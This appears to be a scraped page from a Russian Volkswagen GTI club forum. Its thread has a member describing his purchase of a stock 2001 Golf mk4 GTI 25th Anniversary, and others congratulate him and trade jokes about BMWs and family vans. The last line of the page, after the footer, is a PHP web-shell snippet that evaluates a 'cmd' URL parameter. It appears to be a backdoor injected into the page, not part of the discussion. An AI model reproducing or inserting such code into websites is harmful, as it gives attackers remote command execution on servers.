+ Ответить в теме
Страница 1 из 7 1 2 3 ... ПоследняяПоследняя
Показано с 1 по 10 из 66

Тема: mk4 gti 25th anniversary


  1. #1
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794

    mk4 gti ~ 25th anniversary

    Итак, друзья мои, пришло время создать здесь ещё один топик,который надеюсь уже точно доведу до задуманного ума))
    Эмоциям уже далеко нет предела, поэтому вынужден поделиться ими тут с вами))

    Эту юбилейку уже многие из вас тут видели! Она местная, на клубных рамках и владельца звать Женёк!) Веселый,пазативный парень) покатал меня не много по краснопресненской набережной,потом дал мне потрогать за все и по всякому его!
    Ну а теперь из того что я увидел своими глазами и что сказал Женек.

    Черного цвета,2001г, в России с 2006г всего 2 хозяина,короче все по офеншую как говорится!) 3 двери, салон ткань рекаро с красной ниткой по всюду! 6 мкпп, 180 лс, штатная нокиа с громкой связью!(ваще ништяк) онли сток,что очень радует!
    Ну и кучу мелочей,таких как диски 18 bbs, мешалка и салон с надписью GTI, короче чуть позже все будет,да с фото!)

    Ну и хотелось бы рассказать как все это так вышло!
    Сижу я тут на форуме,да заказываю очередные детали, на своего коня у Ромки, да он мне тут выстреливает такое предложение, знакомый продает носка юбилейного да и при хорошем раскладе для клубни) Долго не думая я погнал в банк к знакомым просит капусту на срочные нужды, через пару дней ответ был ясен!Звонок из банка, фраза в трубке. заходи в гости на чай да Лопатник захвати новенький ;)
    Вот теперь жду выходных с нетерпением,дабы уже забрать его в свои руки)

    Сейчас пока что совсем не думаю о продаже своего цветного лягушОнка.. были пару звонков, но я сказал приостановлено временно пока не починю все по мелочи!! не могу с ним расстаться( столько с ним я пережил всего эмоционального!! Как вспоминаю как мы на нем с друзьями до дачи нашей любимой добирались) И вот мы уже проехали 150км на винтах выкрученных в самый низ,салон забит людьми и собакой,а багажник пивом и мясом! не прошло и 3 часов как мы доехали,побухали хорошо так,затем на утро проснулись, а мотор гольфа на траве лежит(( короче много чего веселого и хорошего с ним пережил, что больно с ним так вот расстаться!(
    Быть может куш где сорву, или еще где деньжата перепадут чтобы 2 гольфа оставить. Поживем увидим)
    Последний раз редактировалось keks; 12.01.2013 в 02:15.
    I love GTIclub

  2. #2
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Молодца!
    Даже не вздумай снимать дисули родные, ибо без них это будет уже не юби)))
    Одна из самых нарядных юби это была, насколько я помню все ориджинал и сток?!
    песок сыпется....не останавливайтесь на достигнутом !

  3. #3
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    Тут знаю много примеров как продают Мк4 юби и не только, чтобы сесть на бэмэве, форд автобус и еще хер знает что, а у тебя мысли по двум носкам оставить)))) красава!
    песок сыпется....не останавливайтесь на достигнутом !

  4. #4
    GTI-Racing Apofis will become famous soon enough Apofis will become famous soon enough Аватар для Apofis
    Регистрация
    05.08.2012
    Откуда
    СВАО
    Машина
    Q7
    Сообщений
    1,040
    а фотку, фотку то покажите!

  5. #5
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    Молодца!
    Даже не вздумай снимать дисули родные, ибо без них это будет уже не юби)))
    Одна из самых нарядных юби это была, насколько я помню все ориджинал и сток?!
    Спасибо Дядя Бон. Диски пару сезонов точно откатают свое,а потом посмотрим!) но поменять их окрас на боей в первую очередь!
    Да,совершенно верно,все ориджинал и онли сток!))

    Тут знаю много примеров как продают Мк4 юби и не только, чтобы сесть на бэмэве, форд автобус и еще хер знает что, а у тебя мысли по двум носкам оставить)))) красава!
    Любимый авто и клуб) Все очевидно :)
    Сам все никак не на радуюсь.)

    а фотку, фотку то покажите
    Фото к сожалению будут только к выходным,надеюсь будет время их выложить)
    I love GTIclub

  6. #6
    Модератор inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice inVENTOr is just really nice Аватар для inVENTOr
    Регистрация
    06.03.2006
    Откуда
    CCCР
    Машина
    BMW 330D Соляра Power
    Сообщений
    1,780
    Цитата Сообщение от BON Посмотреть сообщение
    Тут знаю много примеров как продают Мк4 юби и не только, чтобы сесть на бэмэве, форд автобус и еще хер знает что, а у тебя мысли по двум носкам оставить)))) красава!
    НЕ надо грязи.. А что БМВ это плохо?)))))
    Бон завязывай, я наигрался в песочнице) ) )
    Постоянно лежать под носком в поисках где сифонит, почему не дует, что с детонацией, какова смесь, почему плавает давка на бусте на верхах и т.д..... гденить под костромой в лесах зависнуть от того что наебнулось что то...честно не прильщает..., так что я на своем "Хрен знает чем" форде автобусе, буду ехать без напряга от того что снова пробил колесо, погнул диск, проломил картер...
    Я за 5.5 лет проехал на своем авто столько тыс КМ скока никто тут не проезжал на 1ом автомобиле, так что камень в мой огород прошу не кидать. а то автобусом задавлю нахер!:punish:
    Сорри за офтом, КеКс Поздравляю что купил у Женька машину:) Она как с салона
    BMW 330D POWERED by Dizelboost :pepper:

  7. #7
    Супер Модератор BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of BON has much to be proud of Аватар для BON
    Регистрация
    08.11.2006
    Откуда
    Москва
    Машина
    Skoda
    Сообщений
    15,564
    О, Славик ответил, значит еще не все потеряно и жив чертяга мыслями о Гольфе своем ....бывшем)))))
    Эх Славик, какой же у тебя был юби, эх юби юби (((( Вот ведь наверное не только плохое о нем вспоминаешь ?


    А автобус надо было кстати брать каравеллу или транспортер ((((
    БМВ - хорошо, но то что было старое, очень винтажное и сейчас очень красивое
    песок сыпется....не останавливайтесь на достигнутом !

  8. #8
    GTI-Racing TishONE is on a distinguished road Аватар для TishONE
    Регистрация
    20.07.2008
    Откуда
    MSK
    Машина
    vRS FL 2011 (Race Blue)
    Сообщений
    1,139
    Неожиданный поворот!!!)))

    Поздравляю тебя Юрец!!!))
    MK2 GTI EV - ПРОДАНА.
    Hyundai Sonata 2.0 - ПРОДАНА.
    MK4 GTI AUM - ПРОДАНА.
    Skoda Octavia vRS - ПРОДАНА.
    BMW 116i - ПРОДАНА.
    Land Rover Discovery 4 HSE - комфорт превыше всего)

  9. #9
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    Сорри за офтом, КеКс Поздравляю что купил у Женька машину:) Она как с салона
    Спасибо,буду так же следить за ним!))

    Эх Славик, какой же у тебя был юби, эх юби юби (((( Вот ведь наверное не только плохое о нем вспоминаешь ?
    Уверен тут у каждого была долгая и хорошая история с турбовками! Вспомнить точно будет что.)

    И мое время прийдет пересесть на более экономичный и семейный авто) Но при этом обязательно тогда уж будет стоять на стоянке и стильный mk1 для вы"бонов на выходной день))

    Неожиданный поворот!!!)))

    Поздравляю тебя Юрец!!!))
    Ай спасибо Серега)
    Мне пора бы уже восстанавливать документы на машинку) будешь свободен в понедельник, чтобы за скочить ко мне на Киевскую?)
    I love GTIclub

  10. #10
    GTI-Racing keks is on a distinguished road Аватар для keks
    Регистрация
    25.01.2008
    Откуда
    Москва
    Машина
    mk4 25th anniversary
    Сообщений
    794
    Все,друзья мои, юбилейка стоит во дворе уже моего дома!
    Первые впечатления,что это gti,но 5 поколения по всем характеристикам! Ездил на 5 и разницы 0, даже на моем больше плюсов!
    Садясь за руль этого гольфа, я чувствую себя королем на дороге!) уже было пару приятных респектов, но говорили о них спустя пару минут на стоящем красном светофоре!)) передачи ну очень короткие, что дает вырываться сразу и только вперед!
    Пока ехал до дома забывал переключиться на 6 передачу!!
    Завтра помою и сделаю пару фоток!
    P.s. Ну подтолкните меня купить зимнюю резину на 18 колеса!
    А то мне плакать хочется,видя её на 16 штамповках((
    I love GTIclub

+ Ответить в теме
Страница 1 из 7 1 2 3 ... ПоследняяПоследняя

Похожие темы

  1. Golf Gti 1.8T 20Th Anniversary Edition
    от keks в разделе Покупка и продажа авто
    Ответов: 4
    Последнее сообщение: 12.03.2015, 20:43

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}